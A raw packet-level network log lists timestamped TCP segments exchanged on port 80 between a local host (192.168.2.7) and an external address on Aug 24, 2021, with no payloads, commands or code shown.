Aug 24, 2021 08:46:52.827049017 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.849987984 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.850071907 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.850135088 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.850152969 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.850163937 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.850166082 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.850202084 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.850222111 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.850224972 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.850238085 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.850260019 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.850279093 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.850294113 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.850306034 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.850310087 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.850327015 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.850341082 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.850344896 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.850361109 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.850377083 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.850384951 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.850395918 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.850404024 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.850416899 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.850435019 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.850449085 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.850450039 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.850483894 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.850491047 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.850502968 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.850522041 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.850524902 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.850539923 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.850554943 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.850554943 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.850570917 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.850600004 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.850616932 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.850621939 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.850645065 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.850661993 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.850668907 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.850677013 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.850692987 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.850708008 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.850723028 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.850723982 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.850739002 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.850766897 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.850766897 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.850820065 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.873295069 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.873326063 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.873352051 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.873373985 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.873394012 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.873415947 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.873445034 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.873446941 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.873470068 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.873491049 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.873512983 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.873523951 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.873538017 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.873559952 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.873564005 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.873580933 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.873600960 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.873620987 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.873624086 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.873644114 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.873668909 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.873670101 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.873696089 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.873697042 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.873723030 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.873737097 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.873750925 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.873771906 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.873792887 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.873800993 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.873812914 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.873832941 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.873841047 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.873852968 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.873872995 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.873884916 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.873898983 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.873912096 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.873924017 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.873944044 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.873964071 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.873977900 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.873986006 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.874005079 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.874006033 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.874027014 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.874047041 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.874047041 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.874072075 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.874094009 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.874099016 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.874114990 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.874136925 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.874139071 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.874186039 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.896559954 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.896598101 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.896615982 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.896632910 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.896652937 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.896670103 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.896672010 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.896688938 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.896697044 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.896711111 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.896728039 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.896749020 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.896752119 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.896768093 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.896783113 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.896786928 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.896807909 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.896812916 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.896827936 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.896842957 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.896846056 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.896862030 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.896882057 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.896889925 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.896898985 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.896918058 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.896931887 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.896936893 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.896959066 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.896966934 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.896981001 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.896995068 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.896997929 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.897020102 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.897039890 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.897042036 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.897058010 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.897075891 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.897084951 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.897094965 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.897118092 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.897128105 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.897136927 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.897156954 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.897156954 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.897178888 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.897181988 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.897196054 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.897213936 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.897228956 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.897229910 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.897245884 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.897265911 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.897274017 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.897284031 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.897295952 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.897303104 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.897341967 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.919666052 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.919698000 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.919715881 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.919732094 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.919747114 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.919748068 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.919763088 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.919779062 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.919781923 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.919795990 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.919811964 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.919831991 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.919835091 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.919850111 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.919864893 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.919866085 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.919881105 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.919898033 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.919913054 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.919914007 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.919929028 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.919945002 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.919949055 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.919965029 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.919971943 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.919982910 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.919995070 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.919998884 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.920015097 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.920028925 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.920031071 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.920047045 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.920063019 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.920063972 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.920078039 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.920098066 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.920118093 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.920125008 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.920136929 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.920145035 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.920150042 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.920166016 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.920166969 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.920186043 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.920198917 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.920202971 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.920218945 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.920229912 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.920234919 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.920249939 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.920264959 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.920278072 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.920280933 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.920296907 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.920315027 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.920315981 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.920341969 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.920361996 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.942621946 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.942656994 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.942672968 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.942689896 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.942707062 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.942722082 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.942738056 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.942750931 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.942753077 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.942768097 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.942785978 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.942795992 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.942802906 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.942820072 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.942837000 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.942843914 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.942857027 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.942874908 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.942883015 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.942890882 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.942903996 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.942908049 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.942924976 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.942938089 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.942939997 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.942956924 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.942969084 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.942974091 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.942992926 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.942995071 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.943013906 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.943031073 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.943041086 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.943047047 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.943064928 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.943067074 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.943080902 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.943098068 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.943126917 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.943150997 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.943166971 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.943238974 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.943257093 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.943275928 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.943285942 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.943294048 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.943309069 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.943320036 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.943327904 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.943342924 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.943358898 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.943360090 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.943375111 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.943387032 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.943392038 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.943430901 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.967298985 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.967331886 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.967349052 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.967364073 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.967385054 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.967403889 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.967418909 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.967434883 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.967453003 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.967463017 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.967468977 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.967484951 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.967500925 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.967519999 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.967538118 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.967552900 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.967581987 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.967598915 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.967616081 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.967628002 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.967639923 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.967653036 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.967669964 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.967672110 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.967689991 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.967709064 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.967725039 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.967741013 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.967741013 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.967757940 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.967775106 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.967791080 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.967807055 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.967827082 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.967842102 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.967853069 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.967869997 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.967885971 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.967901945 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.967916965 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.967932940 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.967941046 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.967950106 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.967969894 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.968106985 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.990127087 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.990168095 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.990190983 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.990215063 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.990227938 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.990242004 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.990266085 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:52.990266085 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:52.990289927 CEST	80	49715	212.224.105.79	192.168.2.7
